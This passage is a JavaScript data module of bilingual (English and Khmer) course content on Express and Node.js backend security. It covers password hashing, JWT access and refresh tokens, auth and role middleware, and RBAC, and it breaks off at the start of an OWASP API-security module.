/**
 * modules-16-20.mjs
 * Detailed curriculum data for Modules 16 through 20 (60 topics total)
 */

export const MODULES_16_20 = {
  "M16": [
    {
      "id": "M16-01",
      "number": "01",
      "title": "Authentication vs Authorization",
      "khmerTitle": "ភាពខុសគ្នារវាង Authentication និង Authorization",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Authentication (AuthN) answers 'Who are you?' by verifying identity through credentials like email/password or tokens. Authorization (AuthZ) answers 'What are you allowed to do?' by evaluating privileges, roles, and permissions against resources. In standard backend flows, Authentication must always succeed before Authorization evaluation begins.",
      "tip": "Remember: 401 Unauthorized strictly means unauthenticated (missing or invalid token). 403 Forbidden means authenticated, but lacking sufficient permissions for that resource.",
      "objective": "Distinguish between identity verification (AuthN) and access entitlement (AuthZ) in backend system design.",
      "expectedOutcome": "Accurate architectural separation and correct HTTP status code usage (401 vs 403).",
      "codeSnippet": "// Concept breakdown in Express middleware flow:\n// 1. Authentication (Who are you?) -> returns 401 if unauthenticated\napp.use(\"/api/admin/*\", verifyAuthToken);\n\n// 2. Authorization (What can you do?) -> returns 403 if unauthorized\napp.delete(\"/api/admin/users/:id\", (req, res) => {\n  if (req.user.role !== \"superadmin\") {\n    return res.status(403).json({\n      status: \"fail\",\n      message: \"Forbidden: Only superadmins can delete user accounts\"\n    });\n  }\n  // Proceed with deletion...\n});"
    },
    {
      "id": "M16-02",
      "number": "02",
      "title": "Password Hashing",
      "khmerTitle": "គោលការណ៍គ្រឹះនៃ Password Hashing",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Password hashing transforms a plaintext password into an irreversible, fixed-length alphanumeric string using a one-way cryptographic mathematical function. Unlike encryption which is two-way and reversible with a secret key, secure hashing is permanently irreversible. Storing passwords in plaintext or using fast algorithms like MD5/SHA-1 exposes users to instant credential theft during database leaks.",
      "tip": "Never use encryption (AES/DES) or fast hash algorithms (MD5/SHA256) for passwords. Fast hashes allow attackers to calculate billions of guesses per second via GPU brute-forcing.",
      "objective": "Understand why one-way slow cryptographic hash functions are mandatory for credential storage.",
      "expectedOutcome": "Solid grasp of cryptographic hashing vs encryption and resistance to brute-force attacks.",
      "codeSnippet": "// Plaintext vs Irreversible One-Way Hash:\n// Plaintext: \"SecretP@ss123\" -> stored directly (FATAL SECURITY FLAW)\n// MD5/SHA256: \"SecretP@ss123\" -> fast hash (VULNERABLE to GPU rainbow tables)\n// bcrypt:    \"SecretP@ss123\" -> $2a$12$e8YkZ... (SLOW, SALTED, INDUSTRY STANDARD)\n\n// One-way verification principle:\n// We NEVER decrypt: Decrypt(hash) -> Impossible!\n// Instead we re-hash: bcrypt.compare(incomingCandidate, storedHash);"
    },
    {
      "id": "M16-03",
      "number": "03",
      "title": "bcrypt",
      "khmerTitle": "ការប្រើប្រាស់បណ្ណាល័យ bcrypt",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "bcrypt is an adaptive cryptographic hashing algorithm designed by Niels Provos and David Mazières based on the Blowfish cipher. Its critical feature is the configurable 'work factor' (cost), which exponentially increases calculation time as computing hardware becomes faster. In Node.js, `bcryptjs` provides a pure JavaScript implementation or `bcrypt` for native C++ bindings.",
      "tip": "Use a cost factor (salt rounds) of 12 for modern production servers. It takes roughly 250-350ms per hash, protecting against offline brute-forcing while remaining responsive.",
      "objective": "Install and use bcrypt in Node.js to hash submitted passwords and compare login credentials.",
      "expectedOutcome": "Working credential hashing pipeline with optimal salt rounds configuration.",
      "codeSnippet": "import bcrypt from \"bcryptjs\";\n\n// 1. Generate salt and hash during registration\nconst SALT_ROUNDS = 12;\nconst plainPassword = \"SecurePassword2026!\";\n\nconst salt = await bcrypt.genSalt(SALT_ROUNDS);\nconst passwordHash = await bcrypt.hash(plainPassword, salt);\nconsole.log(\"Hashed Password:\", passwordHash);\n\n// 2. Verify during user login\nconst candidatePassword = \"SecurePassword2026!\";\nconst isMatch = await bcrypt.compare(candidatePassword, passwordHash);\n\nif (!isMatch) {\n  throw new Error(\"Invalid email or password\");\n}\nconsole.log(\"Authentication successful!\");"
    },
    {
      "id": "M16-04",
      "number": "04",
      "title": "Salt & Hash",
      "khmerTitle": "ការបង្កើត Salt និង Hashing ក្នុង bcrypt",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "A cryptographic salt is a random string of bits generated uniquely for every user before hashing. Salting ensures that two identical passwords (e.g. 'password123') produce completely different hash outputs, completely neutralizing precomputed Rainbow Table attacks. In bcrypt, the salt, algorithm identifier, cost factor, and hash are all concatenated into a single string formatted like `$2a$12$salt...hash...`.",
      "tip": "You never need a separate database column for the salt with bcrypt! The generated hash string already includes the salt and work factor in its header prefix.",
      "objective": "Understand how random cryptographic salts eliminate rainbow table and dictionary attacks.",
      "expectedOutcome": "Clear understanding of the anatomy of a bcrypt hash string ($2b$12$...).",
      "codeSnippet": "// Anatomy of a bcrypt hash string:\n// $2b$12$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy\n// ├── 2b     -> bcrypt algorithm revision identifier\n// ├── 12     -> Cost factor (2^12 = 4,096 iterations)\n// ├── N9qo8uLOickgx2ZMRZoMye -> 22-character cryptographic salt (16 bytes base64)\n// └── IjZAgcfl7p92ldGxad68... -> 31-character encrypted hash string\n\n// Notice: No separate salt table or column is required in your database schema."
    },
    {
      "id": "M16-05",
      "number": "05",
      "title": "User Registration Flow",
      "khmerTitle": "លំហូរនៃការចុះឈ្មោះអ្នកប្រើប្រាស់ (Registration Flow)",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "The registration flow coordinates input validation, duplicate checking, password hashing, and persistence. A secure registration controller checks if the email already exists, validates password strength with Zod, applies bcrypt hashing inside a Mongoose pre-save middleware, persists the document, and responds with user metadata while strictly excluding the password hash.",
      "tip": "Use Mongoose pre-save middleware (`userSchema.pre('save')`) to automatically hash passwords, ensuring passwords are never stored in plaintext even during seed scripts or migrations.",
      "objective": "Build an enterprise registration endpoint with email normalization, password hashing, and clean response projection.",
      "expectedOutcome": "Secure sign-up endpoint that creates sanitized user records without leaking hashes.",
      "codeSnippet": "// controllers/auth.controller.js\nimport { User } from \"../models/user.model.js\";\nimport { AppError } from \"../utils/AppError.js\";\n\nexport const register = async (req, res, next) => {\n  try {\n    const { name, email, password } = req.body;\n\n    // 1. Check existing user\n    const existing = await User.findOne({ email: email.toLowerCase() });\n    if (existing) throw new AppError(\"Email is already registered\", 409);\n\n    // 2. Create user (password automatically hashed by mongoose pre-save hook)\n    const user = await User.create({\n      name,\n      email: email.toLowerCase(),\n      password,\n    });\n\n    // 3. Exclude password hash from response payload\n    const safeUser = user.toObject();\n    delete safeUser.password;\n\n    res.status(201).json({\n      status: \"success\",\n      message: \"User registered successfully\",\n      data: { user: safeUser },\n    });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M16-06",
      "number": "06",
      "title": "User Login Flow",
      "khmerTitle": "លំហូរនៃការចូលប្រើប្រាស់ (Login Flow)",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "The login flow verifies submitted credentials against the stored record. It queries the user by normalized email (explicitly selecting the hidden password field), verifies the submitted password with `bcrypt.compare()`, and returns tokens upon match. Timing-attack prevention and generic error messages ('Invalid email or password') ensure attackers cannot enumerate valid user accounts.",
      "tip": "Never tell the client whether it was the email or password that was wrong. Always return a generic 401 'Invalid credentials' to prevent user enumeration.",
      "objective": "Implement a secure login endpoint that protects against enumeration and timing attacks.",
      "expectedOutcome": "Hardened authentication controller issuing credentials upon valid login.",
      "codeSnippet": "// controllers/auth.controller.js\nexport const login = async (req, res, next) => {\n  try {\n    const { email, password } = req.body;\n    if (!email || !password) {\n      throw new AppError(\"Please provide email and password\", 400);\n    }\n\n    // 1. Query user with hidden password field (+password)\n    const user = await User.findOne({ email: email.toLowerCase() }).select(\"+password\");\n    \n    // 2. Compare password with bcrypt (use generic error message)\n    if (!user || !(await bcrypt.compare(password, user.password))) {\n      throw new AppError(\"Invalid email or password\", 401);\n    }\n\n    // 3. Issue authentication token\n    const token = signToken(user._id);\n\n    res.status(200).json({\n      status: \"success\",\n      token,\n      data: { user: { id: user._id, name: user.name, email: user.email } }\n    });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M16-07",
      "number": "07",
      "title": "JWT (JSON Web Token)",
      "khmerTitle": "រចនាសម្ព័ន្ធ និងទ្រឹស្តីនៃ JWT",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "A JSON Web Token (RFC 7519) is a compact, URL-safe standard for cryptographically transmitting claims between parties. A JWT consists of three base64url-encoded parts separated by dots: Header (algorithm & token type), Payload (user claims & expiration timestamp), and Signature (HMAC-SHA256 or RSA hash of header + payload signed with a server secret).",
      "tip": "Never put confidential data like passwords, credit card numbers, or API keys in a JWT payload! The payload is only base64 encoded, not encrypted, and can be read by anyone.",
      "objective": "Understand the three segments of a JWT (Header, Payload, Signature) and how stateless verification works.",
      "expectedOutcome": "Ability to inspect, construct, and cryptographically verify JWTs.",
      "codeSnippet": "// Structure of a JWT:\n// header.payload.signature\n//\n// 1. Header (base64url):   {\"alg\": \"HS256\", \"typ\": \"JWT\"}\n// 2. Payload (base64url):  {\"userId\": \"64f1a2b3...\", \"role\": \"user\", \"exp\": 1773729600}\n// 3. Signature:            HMACSHA256(base64Url(header) + \".\" + base64Url(payload), secretKey)\n\n// Example decoding in Node.js:\nimport jwt from \"jsonwebtoken\";\n\nconst token = jwt.sign({ sub: \"user_123\", role: \"editor\" }, process.env.JWT_SECRET, {\n  expiresIn: \"1h\",\n});\nconsole.log(\"Encoded JWT:\", token);"
    },
    {
      "id": "M16-08",
      "number": "08",
      "title": "Access Tokens",
      "khmerTitle": "ការបង្កើត និងប្រើប្រាស់ Access Tokens",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "An Access Token is a short-lived bearer credential sent by the client on every HTTP request inside the `Authorization: Bearer <token>` header. Because access tokens are stateless, the backend validates them purely via cryptographic signature verification without performing a database lookup on every single request. To limit damage if intercepted, access token lifetimes should be kept between 10 and 15 minutes.",
      "tip": "Keep access token lifespans short (10-15m). If an access token is leaked, the attacker's window of vulnerability expires automatically in a few minutes.",
      "objective": "Generate short-lived access tokens containing minimal claims for stateless authorization.",
      "expectedOutcome": "Production-ready access token signing utility with expiry guarantees.",
      "codeSnippet": "import jwt from \"jsonwebtoken\";\n\nexport const generateAccessToken = (userId, role) => {\n  return jwt.sign(\n    { \n      sub: userId, \n      role: role \n    },\n    process.env.JWT_ACCESS_SECRET,\n    { \n      expiresIn: \"15m\", // Short lifespan for security\n      issuer: \"api.myenterprise.com\",\n      audience: \"myenterprise-client\"\n    }\n  );\n};\n\n// Client sends in header:\n// Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
    },
    {
      "id": "M16-09",
      "number": "09",
      "title": "Refresh Tokens",
      "khmerTitle": "យន្តការ Refresh Tokens និង Token Rotation",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "A Refresh Token is a long-lived credential (typically 7 to 30 days) used solely to obtain a new access token when the current one expires. Unlike access tokens, refresh tokens should be stored in the database or Redis cache so they can be immediately revoked if compromised. In Token Rotation, every time a refresh token is used, it is invalidated and replaced with a brand new one, preventing replay attacks.",
      "tip": "Store hashed refresh tokens in MongoDB or Redis so you can revoke them instantly when a user clicks 'Log out from all devices'.",
      "objective": "Implement a refresh token endpoint with token rotation and revocation capabilities.",
      "expectedOutcome": "Seamless user session persistence without sacrificing credential revocation control.",
      "codeSnippet": "// POST /api/v1/auth/refresh\nexport const refreshTokenHandler = async (req, res, next) => {\n  try {\n    const rawRefreshToken = req.cookies.refreshToken;\n    if (!rawRefreshToken) throw new AppError(\"No refresh token provided\", 401);\n\n    // 1. Verify token signature\n    const decoded = jwt.verify(rawRefreshToken, process.env.JWT_REFRESH_SECRET);\n\n    // 2. Validate token against DB session whitelist\n    const user = await User.findById(decoded.sub);\n    if (!user || user.refreshToken !== rawRefreshToken) {\n      throw new AppError(\"Invalid or expired refresh token\", 403);\n    }\n\n    // 3. Token Rotation: Issue new access token + new refresh token\n    const newAccessToken = generateAccessToken(user._id, user.role);\n    const newRefreshToken = generateRefreshToken(user._id);\n\n    user.refreshToken = newRefreshToken;\n    await user.save({ validateBeforeSave: false });\n\n    // 4. Send updated cookie & access token\n    sendRefreshTokenCookie(res, newRefreshToken);\n    res.json({ status: \"success\", accessToken: newAccessToken });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M16-10",
      "number": "10",
      "title": "HttpOnly Cookies",
      "khmerTitle": "ការការពារ Credential ជាមួយ HttpOnly Cookies",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "An HttpOnly cookie is a browser cookie flag that prevents client-side scripts (JavaScript) from accessing `document.cookie`. This mitigates Cross-Site Scripting (XSS) credential theft because even if malicious JavaScript runs on the client, it cannot read the refresh token. Together with `secure: true` (HTTPS only) and `sameSite: 'strict'` (CSRF mitigation), HttpOnly cookies provide the safest storage for persistent tokens.",
      "tip": "Always combine `httpOnly: true`, `secure: true`, and `sameSite: 'strict'` or `'lax'` when issuing cookies from Express in production.",
      "objective": "Configure secure cookie dispatch in Express with httpOnly, secure, and sameSite attributes.",
      "expectedOutcome": "XSS-resistant credential transmission for web clients.",
      "codeSnippet": "export const sendRefreshTokenCookie = (res, token) => {\n  const isProduction = process.env.NODE_ENV === \"production\";\n\n  res.cookie(\"refreshToken\", token, {\n    httpOnly: true, // Inaccessible to JavaScript document.cookie (Defeats XSS)\n    secure: isProduction, // Transmitted only over HTTPS\n    sameSite: isProduction ? \"strict\" : \"lax\", // Prevents CSRF cross-origin leakage\n    maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days in milliseconds\n    path: \"/api/v1/auth\", // Restricted only to auth refresh endpoints\n  });\n};"
    },
    {
      "id": "M16-11",
      "number": "11",
      "title": "Logout",
      "khmerTitle": "ការចាកចេញពីប្រព័ន្ធ (Logout and Cookie Invalidation)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "In a token-based authentication system, logging out requires two simultaneous steps: invalidating the persistent refresh token in the backend database/cache, and instructing the client browser to immediately purge the HttpOnly cookie by sending an expired cookie header (`maxAge: 0`). For maximum security, you can also store access tokens on a short-lived Redis denylist.",
      "tip": "Setting `res.clearCookie()` alone is not enough! You must also nullify the stored refresh token in MongoDB so that an intercepted copy cannot be reused.",
      "objective": "Build an explicit logout route that clears client cookies and revokes database tokens.",
      "expectedOutcome": "Complete session destruction on both client and server.",
      "codeSnippet": "// POST /api/v1/auth/logout\nexport const logout = async (req, res, next) => {\n  try {\n    const rawRefreshToken = req.cookies.refreshToken;\n\n    if (rawRefreshToken) {\n      // 1. Remove refresh token from database user document\n      await User.findOneAndUpdate(\n        { refreshToken: rawRefreshToken },\n        { $unset: { refreshToken: 1 } }\n      );\n    }\n\n    // 2. Instruct browser to destroy cookie immediately\n    res.clearCookie(\"refreshToken\", {\n      httpOnly: true,\n      secure: process.env.NODE_ENV === \"production\",\n      sameSite: \"strict\",\n      path: \"/api/v1/auth\",\n    });\n\n    res.status(200).json({\n      status: \"success\",\n      message: \"Logged out successfully\",\n    });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M16-12",
      "number": "12",
      "title": "Token Expiration",
      "khmerTitle": "ការគ្រប់គ្រង Token Expiration និង Error Handling",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "When a JWT passes its `exp` timestamp, `jwt.verify()` throws a `TokenExpiredError`. A robust backend catches this specific error and translates it into a distinct 401 response code (e.g. `TOKEN_EXPIRED`), signaling to frontend API interceptors (like Axios) to trigger silent token refresh without interrupting the active user.",
      "tip": "Give expired token responses a unique error code string like `code: 'TOKEN_EXPIRED'` so frontend Axios interceptors know exactly when to trigger silent refresh.",
      "objective": "Catch and gracefully handle TokenExpiredError and JsonWebTokenError exceptions in Express.",
      "expectedOutcome": "Deterministic error responses enabling seamless client-side token refresh.",
      "codeSnippet": "// middleware/errorHandler.js\nexport const handleJwtError = (err, req, res, next) => {\n  if (err.name === \"TokenExpiredError\") {\n    return res.status(401).json({\n      status: \"fail\",\n      code: \"TOKEN_EXPIRED\",\n      message: \"Access token has expired. Please refresh your token.\",\n    });\n  }\n\n  if (err.name === \"JsonWebTokenError\") {\n    return res.status(401).json({\n      status: \"fail\",\n      code: \"TOKEN_INVALID\",\n      message: \"Invalid token. Please log in again.\",\n    });\n  }\n\n  next(err);\n};"
    },
    {
      "id": "M16-13",
      "number": "13",
      "title": "Authentication Middleware",
      "khmerTitle": "ការបង្កើត Authentication Middleware (protect)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "The `protect` middleware intercepts requests to private routes, extracts the Bearer token from the `Authorization` header, verifies its cryptographic signature, checks if the user still exists in the database, and verifies whether the user changed their password after the token was issued. Upon passing all checks, it attaches `req.user` to the request object.",
      "tip": "Always check `user.changedPasswordAfter(decoded.iat)`. If a user resets their password, previously issued tokens must be rejected immediately.",
      "objective": "Construct a production-ready protect middleware enforcing authentication across Express endpoints.",
      "expectedOutcome": "Centralized route protection injecting req.user into downstream handlers.",
      "codeSnippet": "// middleware/auth.middleware.js\nimport jwt from \"jsonwebtoken\";\nimport { User } from \"../models/user.model.js\";\nimport { AppError } from \"../utils/AppError.js\";\n\nexport const protect = async (req, res, next) => {\n  try {\n    // 1. Extract Bearer token from header\n    const authHeader = req.headers.authorization;\n    if (!authHeader || !authHeader.startsWith(\"Bearer \")) {\n      throw new AppError(\"You are not logged in. Please log in to gain access.\", 401);\n    }\n    const token = authHeader.split(\" \")[1];\n\n    // 2. Verify token\n    const decoded = jwt.verify(token, process.env.JWT_ACCESS_SECRET);\n\n    // 3. Check if user still exists\n    const currentUser = await User.findById(decoded.sub);\n    if (!currentUser) {\n      throw new AppError(\"The user belonging to this token no longer exists.\", 401);\n    }\n\n    // 4. Attach verified user to request object\n    req.user = currentUser;\n    next();\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M16-14",
      "number": "14",
      "title": "Protected Routes",
      "khmerTitle": "ការរៀបចំរចនាសម្ព័ន្ធ Protected Routes ក្នុង Express Router",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "In Express, route protection can be applied at the individual endpoint level or across entire router modules using router-level middleware (`router.use(protect)`). Organizing public routes (login, register, forgot-password) separately from protected routes (profile, orders, checkout) enforces strict security boundaries and eliminates repetitive middleware definitions.",
      "tip": "Use `router.use(protect)` at the top of protected route files to safeguard all subsequent routes in that router automatically.",
      "objective": "Architect clear boundaries between public and protected routes in modular Express applications.",
      "expectedOutcome": "Clean, maintainable route declarations with zero unprotected private routes.",
      "codeSnippet": "// routes/user.routes.js\nimport express from \"express\";\nimport { protect } from \"../middleware/auth.middleware.js\";\nimport * as userController from \"../controllers/user.controller.js\";\nimport * as authController from \"../controllers/auth.controller.js\";\n\nconst router = express.Router();\n\n// --- PUBLIC ROUTES ---\nrouter.post(\"/register\", authController.register);\nrouter.post(\"/login\", authController.login);\nrouter.post(\"/refresh\", authController.refreshTokenHandler);\n\n// --- PROTECTED ROUTES (all routes below require valid JWT) ---\nrouter.use(protect);\n\nrouter.get(\"/me\", userController.getProfile);\nrouter.patch(\"/update-me\", userController.updateProfile);\nrouter.delete(\"/delete-me\", userController.deleteAccount);\n\nexport default router;"
    }
  ],
  "M17": [
    {
      "id": "M17-01",
      "number": "01",
      "title": "User Roles",
      "khmerTitle": "ការកំណត់ User Roles ក្នុង Schema",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "User roles define categorical identities within an application (e.g. `user`, `moderator`, `admin`, `superadmin`). In Mongoose, roles are declared as an enumerated string with strict validation and a safe default (e.g. `user`). Restricting role escalation during self-registration ensures standard signups can never assign themselves administrative privileges.",
      "tip": "Never allow `req.body.role` to be saved directly on public registration routes! Always hardcode `role: 'user'` during self-signup.",
      "objective": "Define role schemas with Mongoose enums and enforce strict privilege defaults.",
      "expectedOutcome": "Type-safe role schema preventing unauthorized privilege escalation.",
      "codeSnippet": "// models/user.model.js\nimport mongoose from \"mongoose\";\n\nconst userSchema = new mongoose.Schema({\n  name: { type: String, required: true },\n  email: { type: String, required: true, unique: true },\n  password: { type: String, required: true, select: false },\n  role: {\n    type: String,\n    enum: {\n      values: [\"user\", \"moderator\", \"admin\", \"superadmin\"],\n      message: \"{VALUE} is not a valid user role\"\n    },\n    default: \"user\", // Strict safe default\n  },\n  isActive: { type: Boolean, default: true }\n}, { timestamps: true });\n\nexport const User = mongoose.model(\"User\", userSchema);"
    },
    {
      "id": "M17-02",
      "number": "02",
      "title": "Role-based Access Control",
      "khmerTitle": "គោលការណ៍គ្រឹះនៃ Role-based Access Control (RBAC)",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Role-based Access Control (RBAC) regulates user operations based on roles assigned to individuals within an organization. Instead of assigning granular permissions directly to every user, permissions are grouped into roles, and users are assigned those roles. RBAC simplifies authorization audits, scales seamlessly, and aligns with enterprise compliance requirements.",
      "tip": "Keep role hierarchies flat and clear initially. Introduce permission matrices only when role definitions begin to blur across departments.",
      "objective": "Understand how RBAC decouples user identities from system permissions.",
      "expectedOutcome": "Comprehensive understanding of RBAC models and permission inheritance.",
      "codeSnippet": "// RBAC Conceptual Model:\n// User -> Has Role -> Has Permissions -> Can Access Resource\n//\n// Alice (User)   -> [Role: \"user\"]      -> Read own profile, place order\n// Bob (Support)  -> [Role: \"moderator\"] -> View all orders, issue refunds\n// Carol (SysOps) -> [Role: \"admin\"]     -> Delete products, view metrics, ban users\n//\n// In middleware:\n// if (!roles.includes(req.user.role)) return 403 Forbidden"
    },
    {
      "id": "M17-03",
      "number": "03",
      "title": "Permissions",
      "khmerTitle": "ការគ្រប់គ្រងសិទ្ធិលម្អិត (Fine-grained Permissions)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "When static roles become insufficient for complex applications, fine-grained permission systems map actions to resources using verbs like `products:create`, `orders:refund`, or `users:ban`. An access matrix evaluates whether a user's assigned role or direct permission set contains the required resource action before proceeding.",
      "tip": "Use colon notation for granular permissions: `<resource>:<action>` (e.g. `articles:publish`, `finance:export`).",
      "objective": "Model granular resource-action permission strings and role permission mappings.",
      "expectedOutcome": "Scalable permission matrix capable of fine-grained access control beyond simple roles.",
      "codeSnippet": "// config/permissions.js\nexport const ROLE_PERMISSIONS = {\n  user: [\"products:read\", \"orders:create\", \"orders:read_own\"],\n  moderator: [\"products:read\", \"reviews:moderate\", \"comments:delete\"],\n  admin: [\n    \"products:create\", \"products:update\", \"products:delete\",\n    \"orders:read_all\", \"orders:refund\", \"users:manage\"\n  ]\n};\n\nexport const hasPermission = (userRole, requiredPermission) => {\n  const permissions = ROLE_PERMISSIONS[userRole] || [];\n  return permissions.includes(requiredPermission);\n};"
    },
    {
      "id": "M17-04",
      "number": "04",
      "title": "Admin Routes",
      "khmerTitle": "ការការពារ Admin Routes ដោយឡែក",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Admin routes handle privileged operations like user management, system analytics, and catalog updates. These endpoints should be grouped into dedicated route modules (e.g. `/api/v1/admin/...`) protected by both authentication and role restriction middleware (`restrictTo('admin')`).",
      "tip": "Mount all administrative routes under a single dedicated prefix like `/api/v1/admin` to apply global admin guards and audit logging effortlessly.",
      "objective": "Isolate and protect administrative endpoints behind role-based route guards.",
      "expectedOutcome": "Dedicated admin routing module inaccessible to non-privileged users.",
      "codeSnippet": "// routes/admin.routes.js\nimport express from \"express\";\nimport { protect } from \"../middleware/auth.middleware.js\";\nimport { restrictTo } from \"../middleware/role.middleware.js\";\nimport * as adminController from \"../controllers/admin.controller.js\";\n\nconst router = express.Router();\n\n// Enforce authentication AND admin role for all routes in this file\nrouter.use(protect);\nrouter.use(restrictTo(\"admin\", \"superadmin\"));\n\nrouter.get(\"/dashboard/stats\", adminController.getSystemStats);\nrouter.get(\"/users\", adminController.getAllUsers);\nrouter.patch(\"/users/:id/ban\", adminController.banUser);\n\nexport default router;"
    },
    {
      "id": "M17-05",
      "number": "05",
      "title": "User Routes",
      "khmerTitle": "ការរៀបចំ User Profile Routes និង Self-Service Actions",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "User routes handle self-service account management, such as updating profiles, changing passwords, and viewing personal order histories. Standard authenticated users (`role: 'user'`) must have access to these routes, but must only be permitted to mutate their own account details, never other users' records.",
      "tip": "Use the authenticated `req.user._id` directly instead of taking user IDs from URL params for personal profile updates.",
      "objective": "Build user-specific routes that safely operate on the authenticated user context.",
      "expectedOutcome": "Safe user profile endpoints preventing accidental or malicious cross-account modifications.",
      "codeSnippet": "// controllers/user.controller.js\nexport const getMyProfile = async (req, res, next) => {\n  // Always query by req.user._id, never trust client-supplied ID for \"me\" routes\n  res.json({\n    status: \"success\",\n    data: { user: req.user }\n  });\n};\n\nexport const updateMyPassword = async (req, res, next) => {\n  const { currentPassword, newPassword } = req.body;\n  const user = await User.findById(req.user._id).select(\"+password\");\n\n  if (!(await bcrypt.compare(currentPassword, user.password))) {\n    throw new AppError(\"Current password incorrect\", 400);\n  }\n\n  user.password = newPassword;\n  await user.save(); // triggers pre-save bcrypt hook\n\n  res.json({ status: \"success\", message: \"Password updated successfully\" });\n};"
    },
    {
      "id": "M17-06",
      "number": "06",
      "title": "Authorization Middleware",
      "khmerTitle": "ការបង្កើត restrictTo Middleware Factory",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "The `restrictTo(...roles)` middleware factory accepts a list of permitted roles and returns an Express middleware function. It checks if the already-authenticated `req.user.role` is included in the allowed list. If not, it throws a 403 Forbidden error immediately, halting execution before the controller is reached.",
      "tip": "Always run `protect` BEFORE `restrictTo`. If `req.user` is undefined, `restrictTo` cannot evaluate roles.",
      "objective": "Build a reusable restrictTo middleware factory supporting multiple permitted roles.",
      "expectedOutcome": "Flexible, declarative role authorization middleware for Express routes.",
      "codeSnippet": "// middleware/role.middleware.js\nimport { AppError } from \"../utils/AppError.js\";\n\nexport const restrictTo = (...allowedRoles) => {\n  return (req, res, next) => {\n    // req.user was populated by protect middleware\n    if (!req.user || !allowedRoles.includes(req.user.role)) {\n      return next(\n        new AppError(\n          `Forbidden: Role '${req.user?.role || \"anonymous\"}' does not have permission`,\n          403\n        )\n      );\n    }\n    next();\n  };\n};\n\n// Usage in routes:\n// router.delete(\"/products/:id\", protect, restrictTo(\"admin\"), deleteProduct);"
    },
    {
      "id": "M17-07",
      "number": "07",
      "title": "Resource Ownership",
      "khmerTitle": "ការផ្ទៀងផ្ទាត់កម្មសិទ្ធិនៃទិន្នន័យ (Resource Ownership Verification)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Resource ownership ensures that standard users can only edit or delete items they created (e.g. updating a blog post, canceling an order). A user might have permission to update articles, but only articles where `article.author.toString() === req.user._id.toString()`. Administrators typically bypass ownership checks via role bypass logic.",
      "tip": "Always convert MongoDB ObjectIds to strings with `.toString()` when comparing `doc.owner.toString() === req.user._id.toString()`, because two distinct ObjectId instances never match with `===`.",
      "objective": "Implement resource ownership checks ensuring users can only mutate their own records.",
      "expectedOutcome": "Bulletproof data protection preventing Horizontal Privilege Escalation (IDOR).",
      "codeSnippet": "// controllers/post.controller.js\nexport const updatePost = async (req, res, next) => {\n  try {\n    const post = await Post.findById(req.params.id);\n    if (!post) throw new AppError(\"Post not found\", 404);\n\n    // Check ownership: Must be author OR an administrator\n    const isOwner = post.author.toString() === req.user._id.toString();\n    const isAdmin = req.user.role === \"admin\";\n\n    if (!isOwner && !isAdmin) {\n      throw new AppError(\"You do not have permission to edit this post\", 403);\n    }\n\n    // Apply updates...\n    post.title = req.body.title || post.title;\n    post.content = req.body.content || post.content;\n    await post.save();\n\n    res.json({ status: \"success\", data: { post } });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M17-08",
      "number": "08",
      "title": "Role-based API Design",
      "khmerTitle": "ស្ថាបត្យកម្មរចនា API ប្រកបដោយសុវត្ថិភាពតាមតួនាទី",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Well-designed role-based APIs clearly separate public, authenticated, and privileged endpoints. Consistent route naming, standardized error responses, clear permission matrices, and automated permission tests prevent accidental exposure of privileged capabilities across the application lifecycle.",
      "tip": "Document required permissions in your Swagger/OpenAPI annotations for every route to ensure frontend developers know authentication requirements upfront.",
      "objective": "Design scalable, secure API route architectures applying defense-in-depth authorization.",
      "expectedOutcome": "Clean, documented, and resilient API architecture enforcing role safety.",
      "codeSnippet": "// Architectural Overview:\n//\n// 1. Public Tier (No Auth):\n//    GET  /api/v1/products\n//    POST /api/v1/auth/login\n//\n// 2. Authenticated Tier (protect):\n//    GET  /api/v1/users/me\n//    POST /api/v1/orders\n//\n// 3. Ownership Tier (protect + checkOwner):\n//    PATCH  /api/v1/posts/:id (author only)\n//    DELETE /api/v1/orders/:id (buyer only)\n//\n// 4. Privileged Admin Tier (protect + restrictTo('admin')):\n//    POST   /api/v1/admin/products\n//    PATCH  /api/v1/admin/users/:id/role"
    }
  ],
  "M18": [
    {
      "id": "M18-01",
      "number": "01",
      "title": "Common API Security Problems",
      "khmerTitle": "បញ្ហាសុវត្ថិភាពទូទៅក្នុង Web API (OWASP Top 10)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Modern APIs face pervasive threats classified by OWASP (Open Web Application Security Project). The most damaging vulnerabilities include Broken Object Level Authorization (BOLA/IDOR), Broken Authentication, Mass Assignment, Injection (SQL/NoSQL), Security Misconfiguration, and lack of Rate Limiting leading to denial of service.",
      "tip": "Treat every piece of client input as untrusted. Never rely exclusively on frontend validation — attackers bypass frontend clients entirely using curl or Postman.",
